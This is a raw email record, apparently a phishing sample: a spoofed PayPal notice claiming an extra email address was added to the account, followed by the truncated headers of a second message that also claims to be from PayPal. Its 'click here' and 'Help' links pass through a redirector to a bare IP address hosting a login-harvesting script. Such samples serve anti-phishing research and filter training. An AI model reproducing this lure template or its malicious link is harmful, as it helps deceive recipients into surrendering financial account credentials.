From: "Paypal@" <passwords@paypal.com>
Subject: Additional email address added to your PayPal account 
Date: Thu, 27 Apr 2006 12:48:05 -0600
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <20060427134936.4918A6CCF41@mail1.example.com>
To: undisclosed-recipients: ;
Status: 
X-Status: 
X-Keywords:                   

<html>

<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=Generator content="Microsoft Word 11 (filtered)">
<title>You've added an additional email address to your PayPal account</title> 
<style>
<!--
 /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
 {margin:0in;
 margin-bottom:.0001pt;
 font-size:12.0pt;
 font-family:"Times New Roman";}
a:link, span.MsoHyperlink
 {color:blue;
 text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
 {color:purple;
 text-decoration:underline;}
p
 {margin-right:0in;
 margin-left:0in;
 font-size: 12.0pt;
 font-family:"Times New Roman";}
@page Section1
 {size:8.5in 11.0in;
 margin:1.0in 1.25in 1.0in 1.25in;}
div.Section1
 {page:Section1;}
-->
</style>

</head>

<body lang=EN-US link=blue vlink=purple>

<div class=Section1>

<p class=MsoNormal><span style='font-size:11.0pt'>You've added an additional
email address to your PayPal account.</span></p>

  <p class=MsoNormal><span style='font-size:11.0pt'>If you don't agree with this 
    email denismce93@comcast.net and if you need 
    assistance </span><span style='font-size: 11.0pt'>with your account, </span></p>
  <p class=MsoNormal><span style='font-size:11.0pt'>please <a target="_blank"  href="http://rds.yahoo.com/_ylt  LaSV66fNtDg.kAUoJXNyoA;_ylu=X3oDMTE2ZHVuZ3E3BGNvbG8DdwRsA1dTMQRwb3MDMwRzZWMDc3IEdnRpZANGNjU1Xzc1/SIG8vsd1jp/EXP38544186/**http%3a//195.98.59.34/~test/.us/link.php?bWFpIHByb3N0=aWxvciBtYWkgc3VnZXRpIHB1bGEgZnV0dXZhIG1hbWVsZSBpbiBndXRhIGRlIGxhYmFyaSBjZSBzdW50ZXRpIHNpIGRvYm90b2NpIHBpc2VtYX" 
> click here </a> to login to your account.</span></p>
  <p class=MsoNormal><span style='font-size:11.0pt'>&nbsp;</span></p>

  <p class=MsoNormal><span style='font-size:11.0pt'>To make sure you can use your 
    PayPal account the next time you make a purchase,</span></p>
  <p class=MsoNormal><span style='font-size: 11.0pt'> all you need to do is confirm 
    or not your email address. </span></p>

  <p class=MsoNormal><span style='font-size:11.0pt'>If your email program has problems 
    with hypertext links, </span></p>
  <p class=MsoNormal><span style='font-size:11.0pt'>you may also confirm your 
    email address by logging in to your account.</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>&nbsp;</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>&nbsp;</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>Thank you for using PayPal! </span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>The PayPal Team</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>----------------------------------------------------------------</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>Please do not reply to this
email. This mailbox is not monitored and you will not receive a response.</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>For assistance, log in to
your PayPal account and click the <a target="_blank"  href="http://rds.yahoo.com/_ylt  LaSV66fNtDg.kAUoJXNyoA;_ylu=X3oDMTE2ZHVuZ3E3BGNvbG8DdwRsA1dTMQRwb3MDMwRzZWMDc3IEdnRpZANGNjU1Xzc1/SIG8vsd1jp/EXP38544186/**http%3a//195.98.59.34/~test/.us/link.php?bWFpIHByb3N0=aWxvciBtYWkgc3VnZXRpIHB1bGEgZnV0dXZhIG1hbWVsZSBpbiBndXRhIGRlIGxhYmFyaSBjZSBzdW50ZXRpIHNpIGRvYm90b2NpIHBpc2VtYX" 
> Help</a> 
link located in the top right corner of any PayPal page. </span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>----------------------------------------------------------------</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>&nbsp;</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>PayPal Email ID PP059</span></p>

</div>

</body>

</html>

From service@paypal.com  Thu Apr 27 15:07:35 2006
Return-Path: <service@paypal.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP
	id C97B1CAB489; Thu, 27 Apr 2006 15:07:32 -0400 (EDT)
Received: from 68.79.72.50 (adsl-68-79-72-50.dsl.wotnoh.ameritech.net [68.79.72.50])
	by mail2.example.com (Postfix) with SMTP id D24C96FA335;
	Thu, 27 Apr 2006 15:07:31 -0400 (EDT)
Received: from 164.214.193.13 by ; Fri, 28 Apr 2006 01:26:04 +0500
Message-ID: <O[20
Date: Thu, 27 Apr 2006 15:07:31 -0400 (EDT)
